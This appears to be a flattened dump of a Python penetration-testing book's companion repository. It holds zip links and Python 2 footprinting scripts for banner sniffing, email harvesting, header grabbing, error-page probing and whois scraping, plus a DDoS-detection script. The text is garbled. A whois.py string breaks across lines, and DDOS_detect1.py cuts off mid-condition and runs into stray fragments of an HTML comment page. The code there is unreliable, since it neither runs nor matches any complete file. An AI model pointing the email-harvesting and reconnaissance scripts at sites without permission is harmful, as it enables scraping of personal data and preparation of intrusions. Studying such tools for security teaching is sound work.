https://raw.githubusercontent.com/PacktPublishing/Python-Penetration-Testing-Essentials-Second-Edition/f2a666b62826b4adc334a8e69ccbfe20b5cf12c2/Chapter04/Chapter4_network_attack_preventation.zip
--------------------------------------------------------------------------------
/Chapter05/wireless_chapter5.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Python-Penetration-Testing-Essentials-Second-Edition/f2a666b62826b4adc334a8e69ccbfe20b5cf12c2/Chapter05/wireless_chapter5.zip
--------------------------------------------------------------------------------
/Chapter06/chapter_6_honeypot_program.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Python-Penetration-Testing-Essentials-Second-Edition/f2a666b62826b4adc334a8e69ccbfe20b5cf12c2/Chapter06/chapter_6_honeypot_program.zip
--------------------------------------------------------------------------------
/Chapter07/foot-printing_programs/foot-printing_programs/banner.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import struct
3 | import binascii
4 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))
5 | while True:
6 |
7 | pkt = s.recvfrom(2048)
8 | banner = pkt[0][54:533]
9 | print banner
10 | print "--"*40
11 |
12 |
--------------------------------------------------------------------------------
/Chapter07/foot-printing_programs/foot-printing_programs/div1.py:
--------------------------------------------------------------------------------
1 | import urllib
2 | from bs4 import BeautifulSoup
3 | url = "https://www.hackthissite.org"
4 | ht= urllib.urlopen(url)
5 | html_page = ht.read()
6 | b_object = BeautifulSoup(html_page)
7 | data = b_object.find('div', id ='notice')
8 | print data
--------------------------------------------------------------------------------
/Chapter07/foot-printing_programs/foot-printing_programs/email_finder.py:
--------------------------------------------------------------------------------
1 | import urllib
2 | import re
3 | from bs4 import BeautifulSoup
4 | url = raw_input("Enter the URL ")
5 | ht= urllib.urlopen(url)
6 | html_page = ht.read()
7 | email_pattern=re.compile(r'\b[\w.-]+?@\w+?\.\w+?\b')
8 | for match in re.findall(email_pattern,html_page ):
9 | print match
10 |
11 |
--------------------------------------------------------------------------------
/Chapter07/foot-printing_programs/foot-printing_programs/header.py:
--------------------------------------------------------------------------------
1 | import urllib
2 | url1 = raw_input("Enter the URL ")
3 | http_r = urllib.urlopen(url1)
4 | if http_r.code == 200:
5 | print http_r.headers
--------------------------------------------------------------------------------
/Chapter07/foot-printing_programs/foot-printing_programs/info.py:
--------------------------------------------------------------------------------
1 | import re
2 | import random
3 | import urllib
4 | url1 = raw_input("Enter the URL ")
5 | u = chr(random.randint(97,122))
6 | url2 = url1+u
7 | http_r = urllib.urlopen(url2)
8 | http_r1 = urllib.urlopen(url2)
9 | http_r2 = urllib.urlopen(url2)
10 | flag =0
11 | i=0
12 | list1 = []
13 | a_tag = "<*address>"
14 | file_text = open("result.txt",'a')
15 |
16 | while flag ==0:
17 | if http_r.code == 404:
18 | file_text.write("--------------")
19 | file_text.write(url1)
20 | file_text.write("--------------\n")
21 | file_text.write(http_r1.read())
22 | for match in re.finditer(a_tag,http_r.read()):
23 | i=i+1
24 | s= match.start()
25 | e= match.end()
26 | list1.append(s)
27 | list1.append(e)
28 | if (i>0):
29 | print "Coding is not good"
30 | if len(list1)>0:
31 | a= list1[1]
32 | b= list1[2]
33 | print http_r2.read()[a:b]
34 | else:
35 | print "error handling seems ok"
36 | flag =1
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
--------------------------------------------------------------------------------
/Chapter07/foot-printing_programs/foot-printing_programs/par3.py:
--------------------------------------------------------------------------------
1 | import urllib
2 | from bs4 import BeautifulSoup
3 | url = raw_input("Enter the URL ")
4 | ht= urllib.urlopen(url)
5 | html_page = ht.read()
6 | b_object = BeautifulSoup(html_page)
7 | print b_object.title
8 | print b_object.title.text
9 | for link in b_object.find_all('a'):
10 | print(link.get('href'))
11 |
12 |
--------------------------------------------------------------------------------
/Chapter07/foot-printing_programs/foot-printing_programs/whois.py:
--------------------------------------------------------------------------------
1 | import urllib
2 | from bs4 import BeautifulSoup
3 | import re
4 | domain=raw_input("Enter the domain name ")
5 | url = "http://whois.domaintools.com/"+str(domain)
6 | ht= urllib.urlopen(url)
7 | html_page = ht.read()
8 | b_object = BeautifulSoup(html_page,"lxml")
9 | file_text= open("who.txt",'a')
10 | who_is = b_object.body.find('div',attrs={'class' : 'stats'})
11 | who_is1=str(who_is)
12 |
13 | for match in re.finditer("Domain Name:",who_is1):
14 | s= match.start()
15 |
16 |
17 | lines_raw = who_is1[s:]
18 | lines = lines_raw.split("
",150)
19 | i=0
20 | for line in lines :
21 | file_text.writelines(line)
22 | file_text.writelines("\n")
23 | print line
24 | i=i+1
25 | if i==17 :
26 | break
27 | file_text.writelines("-"*50)
28 | file_text.writelines("\n")
29 | file_text.close()
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
--------------------------------------------------------------------------------
/Chapter07/foot-printing_programs/foot-printing_programs/whois5.py:
--------------------------------------------------------------------------------
1 | from lxml.html import fromstring
2 | import requests
3 |
4 | domain = raw_input("Enter the domain : ")
5 | url = 'http://whois.domaintools.com/' + domain
6 | user_agent = 'wswp'
7 | headers = {'User-Agent': user_agent}
8 | resp = requests.get(url, headers=headers)
9 | html = resp.text
10 |
11 | tree = fromstring(html)
12 | ip = tree.xpath('//*[@id="stats"]//table/tbody/tr//text()')
13 |
14 | list1 = []
15 | for each in ip:
16 | each = each.strip()
17 | if each == "":
18 | continue
19 | list1.append(each.strip("\n"))
20 |
21 | ip_index = list1.index('IP Address')
22 | print "IP address ", list1[ip_index + 1]
23 |
24 | loc1 = list1.index('IP Location')
25 | loc2 = list1.index('ASN')
26 | print 'Location : ', "".join(list1[loc1 + 1:loc2])
27 |
--------------------------------------------------------------------------------
/Chapter08/Programs_client_Side/Programs_client_Side/DDOS_detect1.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import struct
3 | from datetime import datetime
4 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)
5 | dict = {}
6 | file_txt = open("dos.txt",'a')
7 | file_txt.writelines("**********")
8 | t1= str(datetime.now())
9 | file_txt.writelines(t1)
10 | file_txt.writelines("**********")
11 | file_txt.writelines("\n")
12 | print "Detection Start ......."
13 | D_val =10
14 | D_val1 = D_val+10
15 | while True:
16 |
17 | pkt = s.recvfrom(2048)
18 | ipheader = pkt[0][14:34]
19 | ip_hdr = struct.unpack("!8sB3s4s4s",ipheader)
20 | IP = socket.inet_ntoa(ip_hdr[3])
21 | print "Source IP", IP
22 | if dict.has_key(IP):
23 | dict[IP]=dict[IP]+1
24 | print dict[IP]
25 | if(dict[IP]>D_val) and (dict[IP]
4 |
5 |
6 | Leave your Comments
7 |
8 |
35 |
36 |
37 | Old comments
38 |
39 |
40 |
62 |
63 |
64 |